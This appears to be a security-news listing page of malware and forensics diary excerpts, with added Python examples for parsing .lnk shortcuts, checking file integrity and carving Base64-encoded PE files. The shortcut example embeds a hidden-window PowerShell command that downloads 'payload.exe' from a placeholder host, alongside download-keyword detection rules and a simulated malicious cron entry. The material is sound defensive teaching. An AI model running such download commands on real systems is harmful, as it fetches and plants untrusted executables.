Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 4 - Windows Thumbnail Cache, Registry, Prefetch Files, and Link Files artefacts), (Tue, Jul 18th)

[This is the fourth guest diary by Dr. Ali Dehghantanha. Previous diaries in the series are: Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud (Part 1); Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 2 - Log Files artefacts); Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 3 - Physical …

SMS Phishing induces victims to photograph their own token card, (Sun, Jul 16th)

Introduction Today I faced quite an unusual SMS phishing campaign here in Brazil. A friend of mine received an SMS message supposedly sent from his bank asking him to update his registration data through the given URL. Otherwise, he could have his account blocked, as seen in Figure 1. Figure 1: SMS message …

Office maldoc + .lnk, (Sat, Jul 15th)

Reader nik submitted a malicious document. It [image] It [image] And then we can use Woanware [image] Unfortunately, the .lnk file does not contain interesting metadata. But we can see that it uses PowerShell to download an executable from Dropbox. Didier Stevens, Microsoft MVP Consumer Security, blog.DidierStevens.com, DidierStevensLabs.com (c) SANS Internet Storm …
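The diary only says the shortcut's metadata was uninteresting and that its command line runs PowerShell to fetch an executable; the part worth automating is pulling that command line out of the .lnk itself. The following is an added example written for this page, not Didier Stevens' code or the Woanware tool: it parses the Shell Link header, skips the LinkTargetIDList and LinkInfo blocks when present, and reads the StringData fields (relative path, arguments, and so on) in which a downloader's PowerShell one-liner lives. The sample shortcut it builds is constructed for the example, and its URL (`https://example.invalid/...`) is a placeholder, not the Dropbox link from the real document; the `is_downloader_lnk()` heuristic is likewise the example's own, not a published detection rule.

```python
import struct

# LinkFlags bits from the Shell Link (.LNK) binary format (MS-SHLLINK, section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# StringData fields in on-disk order, each gated by its LinkFlags bit.
STRING_FIELDS = [
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
]


def build_lnk(strings, unicode=True):
    """Build a minimal .lnk (header + StringData only) for exercising the parser.

    Constructed sample, not a file from the diary: real shortcuts usually also carry
    a LinkTargetIDList and LinkInfo block, which parse_lnk() skips when present.
    """
    flags = IS_UNICODE if unicode else 0
    body = b""
    for key, flag in STRING_FIELDS:
        if key in strings:
            flags |= flag
            text = strings[key]
            raw = text.encode("utf-16-le") if unicode else text.encode("latin-1")
            body += struct.pack("<H", len(text)) + raw  # CountCharacters, no terminator
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))  # attributes, timestamps etc. zeroed
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a .lnk, skipping the IDList and LinkInfo blocks."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize + IDList bytes
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize covers the whole block
    fields = {"flags": flags}
    for key, flag in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def is_downloader_lnk(fields):
    """Heuristic (this example's own): PowerShell is invoked and a download primitive is named."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments", "working_dir")).lower()
    download_markers = ("downloadfile", "downloadstring", "invoke-webrequest", "http")
    return "powershell" in text and any(m in text for m in download_markers)


def sample_downloader_lnk():
    """Constructed stand-in for the diary's shortcut; the URL is a placeholder, not the real one."""
    return build_lnk({
        "relative_path": "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "arguments": "-w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                     "'https://example.invalid/payload.exe', \"$env:TEMP\\p.exe\")\"",
        "icon_location": "%SystemRoot%\\System32\\shell32.dll",
    })


if __name__ == "__main__":
    parsed = parse_lnk(sample_downloader_lnk())
    for key, value in parsed.items():
        print(f"{key}: {value}")
    print("downloader:", is_downloader_lnk(parsed))
```

On a real shortcut, read the file in binary mode and hand the bytes to `parse_lnk()`; the `relative_path` plus `arguments` pair is usually the whole story for this class of lure, and the LinkInfo block (skipped here) is where the volume serial and local base path live if you do want the metadata the diary found empty.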

NemucodAES and the malspam that distributes it, (Fri, Jul 14th)

Introduction During the past two weeks or so, I've noticed a significant increase in malicious spam (malspam) with attached zip archives disguised as delivery notices from the United Parcel Service (UPS). These zip archives contain JavaScript files designed to download and install NemucodAES ransomware and Kovter malware on a victim's Windows computer. My Online Security …

Investigation of BitTorrent Sync (v.2.0) as a P2P Cloud Service (Part 3 - Physical Memory artefacts), (Thu, Jul 13th)

[This is the third guest diary by Dr. Ali Dehghantanha. You can find his first diary here and second here. If you would like to propose a guest diary, please let us know] Continuing my earlier posts on investigation of BitTorrent Sync version 2.0, this post explains remaining artefacts of user activities in physical memory of Windows 8.1, Mac …

Backup Scripts, the FIM of the Poor, (Wed, Jul 12th)

File Integrity Management or FIM is an interesting security control that can help to detect unusual changes in a file system. For example, on a server, there are directories that do not change often. Example in a UNIX environment: binaries and libraries in /usr/lib, /usr/bin, /bin, /sbin, /usr/local/bin, …; configuration files in /etc; device files in …
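The diary's point is that you do not need a commercial FIM product to notice when a rarely changing directory changes: a hash manifest taken when the system is known-good, compared against a fresh one (or against last night's backup tree), already tells you what was added, removed or modified. The following is an added example for this page, not the diary's own backup script: it builds such a manifest (SHA-256, permission bits and size per regular file, symlinks skipped), stores it as JSON, and classifies the differences. The `/etc` tree it inspects is a constructed temporary directory and the "tampering" it simulates (a flipped `PermitRootLogin`, a new cron entry, a deleted `motd`) is invented for the demonstration.

```python
import hashlib
import json
import os
import shutil
import tempfile


def hash_file(path, chunk_size=65536):
    """SHA-256 of a file, streamed so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map each regular file under root (relative path) to its hash, mode and size.

    Symlinks are skipped: hashing their target would report changes outside root.
    """
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            st = os.stat(full)
            manifest[os.path.relpath(full, root)] = {
                "sha256": hash_file(full),
                "mode": oct(st.st_mode & 0o7777),  # permission bits incl. setuid/setgid/sticky
                "size": st.st_size,
            }
    return manifest


def save_manifest(manifest, path):
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def compare_manifests(baseline, current):
    """Classify differences; a changed mode alone (e.g. a new setuid bit) counts as modified."""
    base_paths, cur_paths = set(baseline), set(current)
    return {
        "added": sorted(cur_paths - base_paths),
        "removed": sorted(base_paths - cur_paths),
        "modified": sorted(p for p in base_paths & cur_paths if baseline[p] != current[p]),
    }


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def run_demo():
    """Constructed scenario: baseline a fake /etc, tamper with it, diff against the baseline."""
    root = tempfile.mkdtemp(prefix="fim-demo-")
    try:
        etc = os.path.join(root, "etc")
        _write(os.path.join(etc, "passwd"), "root:x:0:0:root:/root:/bin/sh\n")
        _write(os.path.join(etc, "motd"), "authorised users only\n")
        _write(os.path.join(etc, "ssh", "sshd_config"), "PermitRootLogin no\n")
        baseline_path = os.path.join(root, "baseline.json")  # kept outside the monitored tree
        save_manifest(build_manifest(etc), baseline_path)

        # Simulated tampering after the baseline was taken (invented for the example).
        _write(os.path.join(etc, "ssh", "sshd_config"), "PermitRootLogin yes\n")
        _write(os.path.join(etc, "cron.d", "persist"), "* * * * * root /tmp/.x\n")
        os.remove(os.path.join(etc, "motd"))

        return compare_manifests(load_manifest(baseline_path), build_manifest(etc))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=1))
```

Two practical caveats the code reflects: keep the baseline manifest (and ideally the script) off the monitored host or at least outside the tree it covers, since an attacker who can rewrite `/etc` can rewrite a manifest stored next to it; and record permission bits as well as content, because a setuid bit added to an unchanged binary is exactly the kind of change a content-only diff misses.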

July's Microsoft Patch Tuesday, (Tue, Jul 11th)

Today's Microsoft Patch Tuesday fixes critical and important flaws that, if exploited, could give an attacker a range of possibilities, from privilege escalation to remote code execution (RCE), on different Windows OS and Microsoft Office versions. One that caught my attention was the RCE which affects the Windows Search service [1] and may allow an …

Basic Office maldoc analysis, (Mon, Jul 10th)

Malicious Office documents come in all types of flavors, sometimes very simple: they contain just an embedded file (for example an EXE), without any script or exploit to automatically launch the embedded file. The user is persuaded through social engineering to extract and execute the embedded file. Analyzing such files in a sandbox will often …

Adversary hunting with SOF-ELK, (Sun, Jul 9th)

As we recently celebrated Independence Day in the U.S., I'm reminded that we honor what was, of course, an armed conflict. Today's realities, when we think about conflict, are quite different than the days of lining troops up across the field from each other, loading muskets, and flinging balls of lead into the fray. We …

A VBScript with Obfuscated Base64 Data, (Sat, Jul 8th)

A few months ago, I posted a diary to explain how to search for (malicious) PE files in Base64 data[1]. Base64 is indeed a common way to distribute binary content in an ASCII form. There are plenty of scripts based on this technique. On my Macbook, I'm using [image] But yesterday, I found, on …
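The search the diary refers to is simple in principle: find runs of Base64 text, decode each one, and keep those that decode to something starting with an MZ header whose `e_lfanew` field points at a `PE\0\0` signature. The following is an added example for this page, not the script the author runs on his MacBook: it does exactly that carve over an arbitrary blob (a script, an e-mail body, a memory dump). The "PE" it looks for is a constructed 88-byte stub with a valid MZ/PE layout and nothing else, and the VBScript-style line it is embedded in is likewise constructed, so no real sample is involved. The minimum run length of 40 characters is an assumption chosen for the example.

```python
import base64
import re
import struct

# Base64 runs long enough to be worth decoding; a real carver may lower this to catch split chunks.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def looks_like_pe(data):
    """True if data starts with an MZ header whose e_lfanew points at a PE\\0\\0 signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"  # out-of-range slice is empty -> False


def find_base64_pe(blob):
    """Return (offset, decoded_length) for every Base64 run in blob that decodes to a PE file."""
    hits = []
    for match in B64_RUN.finditer(blob):
        run = match.group(0)
        try:
            decoded = base64.b64decode(run, validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad padding or length
            continue
        if looks_like_pe(decoded):
            hits.append((match.start(), len(decoded)))
    return hits


def build_fake_pe():
    """Constructed 88-byte stub with a valid MZ/PE layout and nothing else; not executable."""
    e_lfanew = 0x40
    stub = bytearray(b"MZ" + b"\x00" * (0x3C - 2))
    stub += struct.pack("<I", e_lfanew)          # e_lfanew lives at offset 0x3C
    stub += b"PE\x00\x00" + b"\x00" * 20         # signature plus a zeroed COFF header
    return bytes(stub)


def build_sample_script(payload):
    """Constructed VBScript-style line embedding payload as Base64 (no real sample involved)."""
    return b'Dim s: s = "' + base64.b64encode(payload) + b'"'


if __name__ == "__main__":
    script = build_sample_script(build_fake_pe())
    print(find_base64_pe(script))
```

Run `find_base64_pe()` over the raw bytes of the file under analysis; each hit gives the offset of the Base64 run and the size of the decoded binary, which is enough to carve it for further analysis. When a script hides the data by splitting it into concatenated fragments or otherwise obfuscating it, the fragments have to be joined back (or the obfuscation undone) before this check will see a single decodable run.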